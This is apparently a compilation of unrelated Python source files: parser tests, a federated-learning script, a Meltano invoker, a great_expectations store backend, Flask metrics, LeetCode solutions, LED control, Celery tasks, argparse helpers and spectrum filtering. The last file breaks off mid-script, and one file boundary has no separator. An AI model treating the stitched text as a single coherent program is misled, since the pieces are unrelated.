#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
import unittest
from py_privatekonomi.utilities.common import format_time_struct, is_unicode
from py_privatekonomi.utilities import helper
from py_privatekonomi.core import loader
from py_privatekonomi.core.error import FormatterError, ParserError
from py_privatekonomi.tests.test_base import TestBase
from py_privatekonomi.tests.dataset.avanza.sample1 import test_data as test_data_1
from py_privatekonomi.tests.dataset.avanza.excel_sample import test_data as test_data_excel
class TestAvanza(TestBase):
    """End-to-end tests for the avanza parser/formatter pipeline."""

    def setUp(self):
        pass

    def _load(self, sources):
        # All cases share the same app/parser/formatter configuration;
        # only the source path varies.
        return loader.load_app(
            app_name='py_privatekonomi.core.apps.default',
            sources=sources,
            parser_name='avanza',
            formatter_name='avanza')

    def test_sample1(self):
        results = helper.execute_app(self._load('samples/avanza/sample1'))
        self.assertFormatted(results, test_data_1, format_as_mapper=False)

    def test_sample2(self):
        """ sample2 is a copy of sample1 containing three empty rows which should be ignored """
        results = helper.execute_app(self._load('samples/avanza/sample2'))
        self.assertFormatted(results, test_data_1, format_as_mapper=False)

    def test_invalid_sample1(self):
        """ Test invalid transaction file which throws FormatterError """
        app = self._load('samples/invalid/avanza/invalid_sample1')
        self.assertRaises(FormatterError, helper.execute_app, app)

    def test_invalid_sample2(self):
        """ Test invalid transaction file which throws ParserError """
        # BUG FIX: this case previously asserted FormatterError although the
        # docstring (and the otherwise-unused ParserError import) show the
        # intent was to exercise the parser failure path.
        app = self._load('samples/invalid/avanza/invalid_sample2')
        self.assertRaises(ParserError, helper.execute_app, app)

    def test_excel(self):
        """ Test valid excel file """
        results = helper.execute_app(self._load('samples/avanza/excel_sample.xlsx'))
        self.assertFormatted(results, test_data_excel, format_as_mapper=False)
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
import yaml
from fed_exchange_weight_bias.client import Clients
from fed_exchange_weight_bias.server import Server
from fed_exchange_weight_bias.utils.logger import initialize_logging, create_federated_logger
# Hyper-parameters are read once at import time from parameters.yaml.
# FullLoader parses full YAML while avoiding the arbitrary object
# construction of the unsafe legacy yaml.load default.
with open("parameters.yaml", mode='r', encoding="utf-8") as f:
    params = yaml.load(f, Loader=yaml.FullLoader)
if __name__ == "__main__":
    dataset = "cars"
    model_name = "vgg19"
    """Set hyper-parameters."""
    epoch = params["fed_epochs"]
    learning_rate = params["learning_rate"]
    CLIENTS_NUMBER = params["clients_num"]
    # And as federated learning is online,
    # participants are uncertain about their online status in each training epoch.
    CLIENT_RATIO_PER_ROUND = params["client_ratio_per_round"]
    # Dataset-specific characteristics (input shape / number of classes).
    input_shape = params[dataset]["input_shape"]
    classes_num = params[dataset]["classes_num"]
    """Initialize logger."""
    initialize_logging(filepath="logs/", filename="federated_learning.log")
    federated_logger = create_federated_logger("federated learning")
    """Build clients, server."""
    client = Clients(dataset=dataset,
                     model_name=model_name,
                     input_shape=input_shape,
                     classes_num=classes_num,
                     learning_rate=learning_rate,
                     clients_num=CLIENTS_NUMBER)
    server = Server()
    """Begin training."""
    for ep in range(epoch):
        # Empty local_parameters_sum at the beginning of each epoch.
        server.initialize_local_parameters_sum()
        # Choose a random selection of active clients to train in this epoch.
        active_clients = client.choose_clients(CLIENT_RATIO_PER_ROUND)
        # Train these clients.
        for client_id in active_clients:
            client.current_cid = client_id
            print("[fed-epoch {}] cid: {}".format(ep, client_id))
            federated_logger.info("[fed-epoch {}] cid: {}".format(ep, client_id))
            # Pull the latest global model before local training.
            client.download_global_parameters(server.global_parameters)
            client.train_local_model(train_ratio=params["train_ratio"],
                                     local_epochs=params["local_epochs"],
                                     batch_size=params["batch_size"])
            # Accumulate local parameters.
            current_local_parameters = client.upload_local_parameters()
            server.accumulate_local_parameters(current_local_parameters)
        # Update global parameters in each epoch.
        server.update_global_parameters(len(active_clients))
|
"""Defines MeltanoInvoker."""
import os
import subprocess
import sys
from pathlib import Path
from .project import Project
from .project_settings_service import ProjectSettingsService, SettingValueStore
MELTANO_COMMAND = "meltano"
class MeltanoInvoker:
    """Runs the `meltano` CLI (or another command) with a project-aware env."""

    def __init__(self, project, settings_service: ProjectSettingsService = None):
        self.project = project
        self.settings_service = settings_service or ProjectSettingsService(project)

    def invoke(self, args, command=MELTANO_COMMAND, env=None, **kwargs):
        """Invoke `meltano` (or provided command) with provided args and env."""
        executable = self._executable_path(command)
        return subprocess.run(
            [executable, *args],
            **kwargs,
            env=self._executable_env(env)
        )

    def _executable_path(self, command):
        """Resolve `command` to a concrete executable path."""
        if command == MELTANO_COMMAND:
            # This symlink is created by Project.activate
            candidate = self.project.run_dir().joinpath("bin")
            if candidate.exists():
                return str(candidate)

        # Look next to the current Python interpreter.
        sibling = Path(os.path.dirname(sys.executable), command)
        if sibling.exists():
            return str(sibling)

        # Fall back on expecting the command to be in the PATH
        return command

    def _executable_env(self, env=None):
        """Layer the execution env: project settings -> CLI overrides -> explicit."""
        merged = {}

        # Include env that project settings are evaluated in
        merged.update(self.settings_service.env)

        # Include env for settings explicitly overridden using CLI flags
        merged.update(
            self.settings_service.as_env(source=SettingValueStore.CONFIG_OVERRIDE)
        )

        # Explicitly provided env wins last
        if env:
            merged.update(env)

        return merged
|
import logging
import uuid
from abc import ABCMeta, abstractmethod
from typing import Optional
from great_expectations.exceptions import InvalidKeyError, StoreBackendError, StoreError
logger = logging.getLogger(__name__)
class StoreBackend(metaclass=ABCMeta):
    """A store backend acts as a key-value store that can accept tuples as keys, to abstract away
    reading and writing to a persistence layer.

    In general a StoreBackend implementation must provide implementations of:
      - _get
      - _set
      - list_keys
      - _has_key
    """

    # Directory entries that listing/reading operations should skip.
    IGNORED_FILES = [".ipynb_checkpoints"]
    # Reserved key under which the backend persists its own id.
    STORE_BACKEND_ID_KEY = (".ge_store_backend_id",)
    STORE_BACKEND_ID_PREFIX = "store_backend_id = "
    # Sentinel id returned when the backend cannot be read or written.
    STORE_BACKEND_INVALID_CONFIGURATION_ID = "00000000-0000-0000-0000-00000000e003"

    def __init__(
        self,
        fixed_length_key=False,
        suppress_store_backend_id=False,
        manually_initialize_store_backend_id: str = "",
        store_name="no_store_name",
    ):
        """
        Initialize a StoreBackend
        Args:
            fixed_length_key: whether keys are fixed-length tuples
            suppress_store_backend_id: skip construction of a StoreBackend.store_backend_id
            manually_initialize_store_backend_id: UUID as a string to use if the store_backend_id is not already set
            store_name: store name given in the DataContextConfig (via either in-code or yaml configuration)
        """
        self._fixed_length_key = fixed_length_key
        self._suppress_store_backend_id = suppress_store_backend_id
        self._manually_initialize_store_backend_id = (
            manually_initialize_store_backend_id
        )
        self._store_name = store_name

    @property
    def fixed_length_key(self):
        return self._fixed_length_key

    @property
    def store_name(self):
        return self._store_name

    def _construct_store_backend_id(self, suppress_warning: bool = False) -> str:
        """
        Create a store_backend_id if one does not exist, and return it if it exists
        If a valid UUID store_backend_id is passed in param manually_initialize_store_backend_id
        and there is not already an existing store_backend_id then the store_backend_id
        from param manually_initialize_store_backend_id is used to create it.
        Args:
            suppress_warning: boolean flag for whether warnings are logged
        Returns:
            store_backend_id which is a UUID(version=4)
        """
        if self._suppress_store_backend_id:
            if not suppress_warning:
                logger.warning(
                    f"You are attempting to access the store_backend_id of a store or store_backend named {self.store_name} that has been explicitly suppressed."
                )
            # Suppressed backends have no id at all (returns None).
            return
        try:
            try:
                # Normal path: the id was persisted previously; strip the prefix.
                return self.get(key=self.STORE_BACKEND_ID_KEY).replace(
                    self.STORE_BACKEND_ID_PREFIX, ""
                )
            except InvalidKeyError:
                # First access: persist either the manually supplied id or a new UUID4.
                store_id = (
                    self._manually_initialize_store_backend_id
                    if self._manually_initialize_store_backend_id
                    else str(uuid.uuid4())
                )
                self.set(
                    key=self.STORE_BACKEND_ID_KEY,
                    value=f"{self.STORE_BACKEND_ID_PREFIX}{store_id}",
                )
                return store_id
        except Exception:
            # Backend unreadable/unwritable: fall back to the invalid-config sentinel.
            if not suppress_warning:
                logger.warning(
                    f"Invalid store configuration: Please check the configuration of your {self.__class__.__name__} named {self.store_name}"
                )
            return self.STORE_BACKEND_INVALID_CONFIGURATION_ID

    # NOTE: AJB20201130 This store_backend_id and store_backend_id_warnings_suppressed was implemented to remove multiple warnings in DataContext.__init__ but this can be done more cleanly by more carefully going through initialization order in DataContext
    @property
    def store_backend_id(self):
        return self._construct_store_backend_id(suppress_warning=False)

    @property
    def store_backend_id_warnings_suppressed(self):
        return self._construct_store_backend_id(suppress_warning=True)

    def get(self, key, **kwargs):
        """Validate ``key`` and delegate to the concrete ``_get``."""
        self._validate_key(key)
        value = self._get(key, **kwargs)
        return value

    def set(self, key, value, **kwargs):
        """Validate ``key``/``value`` and delegate to the concrete ``_set``."""
        self._validate_key(key)
        self._validate_value(value)
        # Allow the implementing setter to return something (e.g. a path used for its key)
        try:
            return self._set(key, value, **kwargs)
        except ValueError as e:
            logger.debug(str(e))
            raise StoreBackendError("ValueError while calling _set on store backend.")

    def move(self, source_key, dest_key, **kwargs):
        """Validate both keys and delegate to the concrete ``_move``."""
        self._validate_key(source_key)
        self._validate_key(dest_key)
        return self._move(source_key, dest_key, **kwargs)

    def has_key(self, key):
        self._validate_key(key)
        return self._has_key(key)

    def get_url_for_key(self, key, protocol=None):
        # Optional capability; URL-addressable backends override this.
        raise StoreError(
            "Store backend of type {:s} does not have an implementation of get_url_for_key".format(
                type(self).__name__
            )
        )

    def _validate_key(self, key):
        # Keys must be tuples whose elements are all strings.
        if isinstance(key, tuple):
            for key_element in key:
                if not isinstance(key_element, str):
                    raise TypeError(
                        "Elements within tuples passed as keys to {} must be instances of {}, not {}".format(
                            self.__class__.__name__,
                            str,
                            type(key_element),
                        )
                    )
        else:
            raise TypeError(
                "Keys in {} must be instances of {}, not {}".format(
                    self.__class__.__name__,
                    tuple,
                    type(key),
                )
            )

    def _validate_value(self, value):
        # No-op by default; subclasses may restrict storable values.
        pass

    @abstractmethod
    def _get(self, key):
        raise NotImplementedError

    @abstractmethod
    def _set(self, key, value, **kwargs):
        raise NotImplementedError

    @abstractmethod
    def _move(self, source_key, dest_key, **kwargs):
        raise NotImplementedError

    @abstractmethod
    def list_keys(self, prefix=()):
        raise NotImplementedError

    @abstractmethod
    def remove_key(self, key):
        raise NotImplementedError

    def _has_key(self, key):
        raise NotImplementedError

    def is_ignored_key(self, key):
        # True when any ignored filename appears among the key elements.
        for ignored in self.IGNORED_FILES:
            if ignored in key:
                return True
        return False
class InMemoryStoreBackend(StoreBackend):
    """StoreBackend whose persistence layer is a plain Python dict."""

    # noinspection PyUnusedLocal
    def __init__(
        self,
        runtime_environment=None,
        fixed_length_key=False,
        suppress_store_backend_id=False,
        manually_initialize_store_backend_id: str = "",
        store_name=None,
    ):
        super().__init__(
            fixed_length_key=fixed_length_key,
            suppress_store_backend_id=suppress_store_backend_id,
            manually_initialize_store_backend_id=manually_initialize_store_backend_id,
            store_name=store_name,
        )
        self._store = {}
        # Initialize with store_backend_id if not part of an HTMLSiteStore
        if not self._suppress_store_backend_id:
            _ = self.store_backend_id

    def _get(self, key):
        try:
            return self._store[key]
        except KeyError as err:
            # Translate the dict miss into the store-level error type.
            raise InvalidKeyError(f"{str(err)}")

    def _set(self, key, value, **kwargs):
        self._store[key] = value

    def _move(self, source_key, dest_key, **kwargs):
        # Copy first, then delete, matching the original two-step semantics.
        self._store[dest_key] = self._store[source_key]
        del self._store[source_key]

    def list_keys(self, prefix=()):
        # A key matches when its leading elements equal the prefix tuple.
        return [k for k in self._store if k[: len(prefix)] == prefix]

    def _has_key(self, key):
        return key in self._store

    def remove_key(self, key):
        del self._store[key]
|
import logging
import uuid
import psutil
from datetime import datetime
import os
from flask import signals
from pythonapm.metrics.gauge import Gauge
from pythonapm.metrics.histogram import Histogram
from pythonapm.surfacers import Surfacers
from pythonapm.surfacers.log import LogSurfacer
logger = logging.getLogger(__name__)
class PythonAPM(object):
    """
    Instruments flask applications, exposes a number of configurable metrics.

    Hooks into the Flask request lifecycle via signals and records:
      - request wall time in microseconds (histogram)
      - RSS memory growth over the request (gauge)
    """

    def __init__(self, app, surfacers=None):
        """
        :param app: Flask application to instrument
        :param surfacers: Surfacers collection; when omitted, a fresh
            LogSurfacer-backed collection is built per instance.
            (The previous mutable default argument shared a single
            Surfacers instance across every PythonAPM object.)
        """
        self.app = app
        self.surfacers = surfacers if surfacers is not None else Surfacers(LogSurfacer())
        self.request_time = Histogram(
            'pythonapm.http.request.time_microseconds',
            surfacers=self.surfacers,
        )
        self.rss_diff = Gauge(
            'pythonapm.http.request.rss.diff.bytes',
            surfacers=self.surfacers,
        )
        # Per-request scratch state, populated by request_started.
        self.request_data = {
            'request_start_time': None,
            'request_start_rss': None,
        }
        self.init_apm(app)

    def init_apm(self, app):
        """Register signal handlers and the response decorator on the app."""
        self.register_signals(app)
        app.after_request(self.decorate_response)

    def register_signals(self, app):
        # weak=False keeps the bound-method receiver alive for the app's lifetime.
        signals.got_request_exception.connect(
            self.handle_exception, sender=app, weak=False)
        signals.request_started.connect(self.request_started, sender=app)
        signals.request_finished.connect(self.request_finished, sender=app)

    def decorate_response(self, response):
        """Tag every response with a unique id header."""
        # Header values must be strings; recent werkzeug versions reject
        # non-str values such as a raw uuid.UUID instance.
        response.headers['dm03514/pythonapm'] = str(uuid.uuid4())
        return response

    def handle_exception(self, *args, **kwargs):
        # Flush whatever was collected before the request blew up.
        self.surfacers.flush()

    def request_started(self, *args, **kwargs):
        logger.debug('request_started')
        self.surfacers.clear()
        self.request_data['request_start_time'] = datetime.utcnow()
        self.request_data['request_start_rss'] = \
            psutil.Process(os.getpid()).memory_info().rss

    def request_finished(self, *args, **kwargs):
        logger.debug('request_finished')
        self.observe_request_time()
        self.set_request_rss_diff()
        self.surfacers.flush()

    def observe_request_time(self):
        """Record the full request duration in microseconds."""
        diff = datetime.utcnow() - self.request_data['request_start_time']
        # BUG FIX: timedelta.microseconds is only the sub-second component
        # (0..999999), so requests longer than one second were under-reported.
        # Use the total duration converted to microseconds instead.
        self.request_time.observe(int(diff.total_seconds() * 1e6))

    def set_request_rss_diff(self):
        """Record RSS growth (bytes) between request start and finish."""
        diff = psutil.Process(os.getpid()).memory_info().rss \
            - self.request_data['request_start_rss']
        self.rss_diff.set(diff)
|
class TreeNode:
    """A binary-tree node holding a value and optional child links."""

    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right
class Solution:
    def hasPathSum(self, root: TreeNode, targetSum: int) -> bool:
        """Return True if some root-to-leaf path sums to ``targetSum``
        (recursive depth-first variant)."""
        if root is None:
            return False
        remaining = targetSum - root.val
        # At a leaf, the path is complete iff nothing remains to consume.
        if root.left is None and root.right is None:
            return remaining == 0
        return (self.hasPathSum(root.left, remaining)
                or self.hasPathSum(root.right, remaining))
class Solution:
    def hasPathSum(self, root: TreeNode, targetSum: int) -> bool:
        """Return True if some root-to-leaf path sums to ``targetSum``
        (iterative depth-first variant tracking the remaining sum)."""
        if not root:
            return False
        # BUG FIX: the original seeded the stack with ``sum - root.val``,
        # referencing the builtin ``sum`` function instead of the
        # ``targetSum`` argument — a guaranteed TypeError at runtime.
        stack = [(root, targetSum - root.val)]
        while stack:
            node, curr_sum = stack.pop()
            # Leaf with zero remaining means a complete matching path.
            if not node.left and not node.right and curr_sum == 0:
                return True
            if node.left:
                stack.append((node.left, curr_sum - node.left.val))
            if node.right:
                stack.append((node.right, curr_sum - node.right.val))
        return False
|
from testcases import (
TestServerTestCase,
get_client
)
from django.core.management import call_command
class OrderByTestCase(TestServerTestCase):
    """Integration tests for order_by handling in the test-server client."""

    def setUp(self):
        # Boot the test server and load a small fixture before each test.
        self.start_test_server()
        self.client = get_client()
        call_command('loaddata', 'small_data.json')

    def tearDown(self):
        self.stop_test_server()

    def test_order1(self):
        """order_by("-id") yields usable, consistently ordered results."""
        for i in self.client.message.objects.order_by("-id")[0:30]:
            self.assertTrue(i)
        order1 = self.client.message.objects.all().order_by("-id")[0:30]
        for i in order1:
            self.assertTrue(i)
        # Iterating the same queryset via .all() and directly must give
        # identical ordering.
        order2 = self.client.message.objects.all().order_by("-id")
        for i, k in zip(order2.all(), order2):
            self.assertTrue(i.id == k.id)
        order3 = self.client.message.objects.order_by("-id")
        for i, k in zip(order3.all(), order3):
            self.assertTrue(i.id == k.id)
#!/usr/bin/python3
# -*- coding: utf-8 -*-
__author__ = "Thomas Kaulke"
__email__ = "kaulketh@gmail.com"
__maintainer__ = "Thomas Kaulke"
__status__ = "Production"
import datetime
from rpi_ws281x import *
from config import LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_BRIGHTNESS, \
LED_INVERT, LED_NIGHT_CUT_OFF, \
LED_MORNING_CUT_OFF, LED_DAY_BRIGHTNESS, \
LED_NIGHT_BRIGHTNESS
from logger import LOGGER
class Strip:
    """Wrapper that builds and initializes an Adafruit_NeoPixel LED strip."""

    name = "LED Strip"

    def __init__(self, count, pin, hz, dma, invert, brightness):
        """
        :param count: number of LED pixels
        :param pin: GPIO pin connected to the pixel data line
        :param hz: LED signal frequency in Hz
        :param dma: DMA channel used to generate the signal
        :param invert: True to invert the signal
        :param brightness: initial brightness, 0 (darkest) to 255
        """
        self.__logger = LOGGER
        self.__count = count
        self.__pin = pin
        self.__hz = hz
        self.__dma = dma
        self.__invert = invert
        self.__brightness = brightness
        self.__logger.debug(f"Create {self}")
        self.__strip = Adafruit_NeoPixel(self.__count, self.__pin, self.__hz,
                                         self.__dma, self.__invert,
                                         self.__brightness)
        self.__logger.debug(f"Initialized: {self.__strip}")
        # Must be called once before the strip can be driven.
        self.__strip.begin()

    def __repr__(self):
        return (
            f"{self.name}: "
            f"COUNT:{self.__count}, "
            f"PIN:{self.__pin}, "
            f"FREQ:{self.__hz}, "
            f"DMA:{self.__dma}, "
            f"INVERT:{self.__invert}, "
            f"BRIGHTN.:{self.__brightness}")

    def get_strip(self):
        # Expose the underlying Adafruit_NeoPixel instance.
        return self.__strip

    @classmethod
    def setup(cls, s: Adafruit_NeoPixel):
        """
        Low light during given period.
        Applies day or night brightness depending on the current hour.
        :param s: Adafruit_NeoPixel
        :return: Datetime, Brightness
        """
        now = datetime.datetime.now()
        # Daytime window is (LED_MORNING_CUT_OFF, LED_NIGHT_CUT_OFF) exclusive.
        if LED_MORNING_CUT_OFF < int(now.hour) < LED_NIGHT_CUT_OFF:
            s.setBrightness(LED_DAY_BRIGHTNESS)
        else:
            s.setBrightness(LED_NIGHT_BRIGHTNESS)
        b = s.getBrightness()
        return now, b
def set_brightness_depending_on_daytime(s: Adafruit_NeoPixel):
    """Module-level convenience wrapper around :meth:`Strip.setup`."""
    return Strip.setup(s)
# Shared strip instance, configured entirely from config constants.
# NOTE(review): constructing this at import time touches the LED hardware
# (Adafruit_NeoPixel.begin is called in Strip.__init__).
STRIP = Strip(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT,
              LED_BRIGHTNESS).get_strip()

if __name__ == '__main__':
    pass
|
# -*- coding: utf-8 -*-
# (c) 2017 Andreas Motl <andreas@ip-tools.org>
import celery
from uspto.peds.client import UsptoPatentExaminationDataSystemClient
from uspto.util.tasks import GenericDownloadTask, AsynchronousDownloader
class UsptoPatentExaminationDataSystemDownloadTask(GenericDownloadTask):
    """Celery task class for downloading documents from USPTO PEDS."""
    name = 'uspto.peds.tasks.UsptoPatentExaminationDataSystemDownloadTask'
    client_factory = UsptoPatentExaminationDataSystemClient
@celery.shared_task(bind=True, base=UsptoPatentExaminationDataSystemDownloadTask)
def download_task(self, query, options=None):
    """
    Run a PEDS download through the shared Celery task machinery.
    https://celery.readthedocs.io/en/latest/userguide/tasks.html#basics
    http://docs.celeryproject.org/en/latest/whatsnew-4.0.html#the-task-base-class-no-longer-automatically-register-tasks
    """
    return self.process(query, options)
class UsptoPatentExaminationDataSystemDownloader(AsynchronousDownloader):
    """Asynchronous downloader bound to the PEDS Celery task."""
    task_function = download_task
|
import argparse
import textwrap
from datetime import date
version = '1.0.11'
today = date.today()
class CustomHelpFormatter(argparse.HelpFormatter):
    """
    Help formatter that tweaks argparse's default rendering:
    the metavar is shown once after the joined option strings, and
    wrapped help lines are indented by three spaces.
    """

    def _format_action_invocation(self, action):
        # Positionals and zero-argument flags keep the stock rendering.
        if not action.option_strings or action.nargs == 0:
            return super()._format_action_invocation(action)
        metavar = self._format_args(
            action, self._get_default_metavar_for_optional(action))
        return f"{', '.join(action.option_strings)} {metavar}"

    def _split_lines(self, text, width):
        # Indent every continuation line by three spaces.
        lines = text.splitlines()
        return lines[:1] + ['   ' + line for line in lines[1:]]
class MyHelpFormatter(CustomHelpFormatter, argparse.RawTextHelpFormatter):
    """Combines the custom invocation/indent tweaks with raw-text help."""
    pass
def add_global_arguments(parser, optional, required, in_help, out_help, inp, pre_suf, out_dir):
    """Attach the argparse options shared by every PhyloFisher script.

    :param parser: the ArgumentParser being populated
    :param optional: argparse group instance for optional arguments
    :param required: argparse group instance for required arguments
    :param in_help: help message output for input
    :param out_help: help message output for output
    :param inp: when True, add the required -i/--input option
    :param pre_suf: when True, add -p/--prefix and -s/--suffix
    :param out_dir: when True, add -o/--output with a dated default
    """
    # Required arguments
    if inp is True:
        required.add_argument(
            '-i', '--input', required=True, type=str, metavar='<in_dir>',
            help=textwrap.dedent(f"""{in_help}"""))
    # Optional arguments
    if out_dir is True:
        # Default output dir: "<script>_out_<Mon.DD.YYYY>".
        stamp = today.strftime("%b.%d.%Y")
        default_out = f'{format(parser.prog).split(".")[0]}_out_{stamp}'
        optional.add_argument(
            '-o', '--output', default=default_out, type=str, metavar='<out_dir>',
            help=textwrap.dedent(f"""{out_help}
                              """))
    if pre_suf is True:
        optional.add_argument(
            '-p', '--prefix', metavar='<prefix>', type=str, default='',
            help=textwrap.dedent("""\
                              Prefix of input files
                              Default: NONE
                              Example: path/to/input/prefix*"""))
        optional.add_argument(
            '-s', '--suffix', metavar='<suffix>', type=str, default='',
            help=textwrap.dedent("""\
                              Suffix of input files.
                              Default: NONE
                              Example: path/to/input/*suffix
                              """))
    # -h is added manually because parsers are built with add_help=False.
    optional.add_argument(
        '-h', '--help', action='help', default=argparse.SUPPRESS,
        help=textwrap.dedent("""\
                              Show this help message and exit.
                              """))
def initialize_argparse(name: object, desc: object, usage: object) -> object:
    """Build the project's ArgumentParser and its argument groups.

    Returns a (parser, optional_group, required_group) triple; the
    optional group is popped so callers can re-append it after the
    required group for nicer help ordering.
    """
    def formatter(prog):
        # Wide help column keeps option strings and help on one line.
        return MyHelpFormatter(prog, max_help_position=100)

    # noinspection PyTypeChecker
    parser = argparse.ArgumentParser(
        prog=name,
        description=desc,
        usage=usage,
        formatter_class=formatter,
        add_help=False,
        epilog=textwrap.dedent(f"""\
        additional information:
         Version: {version}
         GitHub: https://github.com/TheBrownLab/PhyloFisher
         Cite: doi:https://10.1371/journal.pbio.3001365
         """))
    optional = parser._action_groups.pop()
    required = parser.add_argument_group('required arguments')
    return parser, optional, required
def get_args(parser, optional, required, pre_suf=True, inp_dir=True, out_dir=True,
             in_help='Path to input directory'):
    """Attach the shared arguments and parse the command line.

    Re-appends the optional group after the required one so it renders
    last in --help output. Returns the parsed Namespace.
    """
    out_help = ('Path to user-defined output directory\n'
                f'Default: ./{format(parser.prog).split(".")[0]}_out_<M.D.Y>')
    add_global_arguments(parser, optional, required,
                         in_help=in_help, out_help=out_help, inp=inp_dir,
                         pre_suf=pre_suf, out_dir=out_dir)
    parser._action_groups.append(optional)
    return parser.parse_args()
|
import numpy as np
from scipy.signal import butter, lfilter, filtfilt, lfilter_zi
import copy
from P_extend import k_extend
def compare(A, B):
    """Return the summed element-wise residual of A relative to B.

    Zero means the inputs agree exactly (up to cancellation).
    """
    residual = A - B
    return np.sum(residual)
def filter_highk(k,P_in,start,end):
    """Low-pass filter the high-k tail of a power spectrum.

    The smoothed and original curves are blended over [start, end] in k
    with a cosine-shaped cross-fade, so the output transitions smoothly
    from the raw data into the filtered tail.

    :param k: wavenumber grid (1D array; assumed ascending — TODO confirm)
    :param P_in: power spectrum sampled on k
    :param start: k where the cross-fade begins
    :param end: k where the cross-fade ends
    :return: copy of P_in with the k > start region smoothed
    """
    P_out=copy.deepcopy(P_in)
    # start = k where you want to start the cross-fade
    # end = k where you want to end the cross-fade
    # filtering specific
    k_start=start; k_end=end
    id1=np.where( k > k_end)[0]   # NOTE(review): unused
    id2=np.where( k <= k_end)[0]  # NOTE(review): unused
    id3=np.where( k > k_start)[0]
    #id4=np.where( k <= k_start)[0]
    id4=np.where( (k > k_start) & ( k<= k_end))[0]
    order=6; wn=.1
    B,A=butter(order,wn, btype='low', analog=False)
    # Cosine-tapered weight: 1 at k_start falling to 0 at k_end.
    theta=np.linspace(1,0,id4.size)
    W_fad=theta - 1/2./np.pi*np.sin(2*np.pi*theta)
    filt_pad=id3.size
    # end filtering specific
    def zero_phase(sig):
        # Zero-pad, filter forward then backward (approximate zero-phase),
        # then trim the result back to the original length.
        sig=np.pad(sig,(filt_pad,filt_pad), 'constant', constant_values=(0, 0))
        #zi=lfilter_zi(B,A)
        #x,_=lfilter(B,A,sig, zi=zi*sig[0])
        x=lfilter(B,A,sig)
        #y,_=lfilter(B,A,x,zi=zi*x[0])
        y=lfilter(B,A,x[::-1])
        y=y[::-1]
        #return y
        return y[filt_pad:id3.size+filt_pad]
    P_smoothed=zero_phase(P_out[id3])
    P_patch=P_out[id4]*W_fad
    P_out[id3]=P_smoothed
    # Cross-fade: weighted original + complementary weight of the smoothed curve.
    P_out[id4]=P_patch+(1-W_fad)*P_out[id4]
    return P_out
def filter_lowk(k,P_in,start,end):
    """Low-pass filter the low-k end of a power spectrum.

    Mirror of filter_highk: the smoothed and original curves are blended
    over [start, end] in k with a cosine-shaped cross-fade (taper reversed
    so the filtered region is at small k).

    :param k: wavenumber grid (1D array; assumed ascending — TODO confirm)
    :param P_in: power spectrum sampled on k
    :param start: k where the cross-fade begins
    :param end: k where the cross-fade ends
    :return: copy of P_in with the k < end region smoothed
    """
    P_out=copy.deepcopy(P_in)
    # start = k where you want to start the cross-fade
    # end = k where you want to end the cross-fade
    # filtering specific
    k_start=start; k_end=end
    id1=np.where( k > k_end)[0]   # NOTE(review): unused
    id2=np.where( k <= k_end)[0]  # NOTE(review): unused
    id3=np.where( k < end)[0]
    id4=np.where( (k > k_start) & ( k<= k_end))[0]
    order=6; wn=.1
    B,A=butter(order,wn, btype='low', analog=False)
    # Reversed cosine taper: 0 at k_start rising to 1 at k_end.
    theta=np.linspace(1,0,id4.size)
    theta=theta[::-1]
    W_fad=theta - 1/2./np.pi*np.sin(2*np.pi*theta)
    filt_pad=id3.size
    # end filtering specific
    def zero_phase(sig):
        # Zero-pad, filter forward then backward (approximate zero-phase),
        # then trim the result back to the original length.
        sig=np.pad(sig,(filt_pad,filt_pad), 'constant', constant_values=(0, 0))
        #zi=lfilter_zi(B,A)
        #x,_=lfilter(B,A,sig, zi=zi*sig[0])
        x=lfilter(B,A,sig)
        #y,_=lfilter(B,A,x,zi=zi*x[0])
        y=lfilter(B,A,x[::-1])
        y=y[::-1]
        #return y
        return y[filt_pad:id3.size+filt_pad]
    P_smoothed=zero_phase(P_out[id3])
    P_patch=P_out[id4]*W_fad
    P_out[id3]=P_smoothed
    # Cross-fade: weighted original + complementary weight of the smoothed curve.
    P_out[id4]=P_patch+(1-W_fad)*P_out[id4]
    return P_out
def BW_filter(P_in, order=3, nf=.01):
    """Zero-phase low-pass Butterworth filter of a sampled curve.

    :param P_in: input signal (1D array, longer than 2*padlen=400 samples)
    :param order: Butterworth filter order
    :param nf: normalized cutoff frequency (fraction of Nyquist)
    :return: the filtered signal, same shape as P_in
    """
    # BUG FIX: the original used a Python 2 print statement, which is a
    # SyntaxError under Python 3.
    print('at butter, freq=', nf)
    B, A = butter(order, nf, 'low')
    sig_ff = filtfilt(B, A, P_in, padlen=200)
    return sig_ff
if __name__=="__main__":
    # Demo / visual check: extend the Planck 2015 spectrum beyond its
    # tabulated range, smooth both ends, and compare against the original
    # in four matplotlib panels.
    d=np.loadtxt('Pk_Planck15.dat')
    k=d[:,0]; P0=d[:,1]
    import copy
    test=copy.deepcopy(P0)
    low_extrap=-4
    high_extrap=5
    EK=k_extend(k,low_extrap,high_extrap)
    k=EK.extrap_k()
    P0=EK.extrap_P_low(P0)
    P0=EK.extrap_P_high(P0)
    P1=filter_highk(k,P0,1,5)
    P2=filter_lowk(k,P0,.01,.05)
    # Undo the extrapolation before plotting (PK_orginal is the library's
    # own spelling).
    k,P1=EK.PK_orginal(P1)
    k,P2=EK.PK_orginal(P2)
    k,P0=EK.PK_orginal(P0)
    import matplotlib.pyplot as plt
    # Panel 1: second differences (roughness proxy), high-k smoothing.
    ax=plt.subplot(141)
    ax.set_xscale('log')
    #ax.set_ylim(.99,1.01)
    ax.set_yscale('log')
    #P3=BW_filter(P0)
    ax.plot(k[:-2],np.absolute(np.diff(P0,2)), label='orginal')
    ax.plot(k[:-2],np.absolute(np.diff(P1,2)), '--', label='high filtered')
    plt.grid()
    plt.legend()
    # Panel 2: second differences, low-k smoothing.
    ax=plt.subplot(142)
    ax.set_xscale('log')
    ax.set_yscale('log')
    P1=filter_highk(k,P0,1,5)
    P2=filter_lowk(k,P0,.01,.05)
    ax.plot(k[:-2],np.absolute(np.diff(P0,2)), label='orginal')
    ax.plot(k[:-2],np.absolute(np.diff(P2,2)), '--', label='low filtered')
    plt.grid()
    plt.legend()
    # Panel 3: filtered / original ratios (should stay near 1).
    ax=plt.subplot(143)
    ax.set_ylim(.99,1.01)
    ax.set_xscale('log')
    P1=filter_highk(k,P0,1,5)
    P2=filter_lowk(k,P0,.01,.05)
    ax.plot(k,P1/P0, label='high filtered')
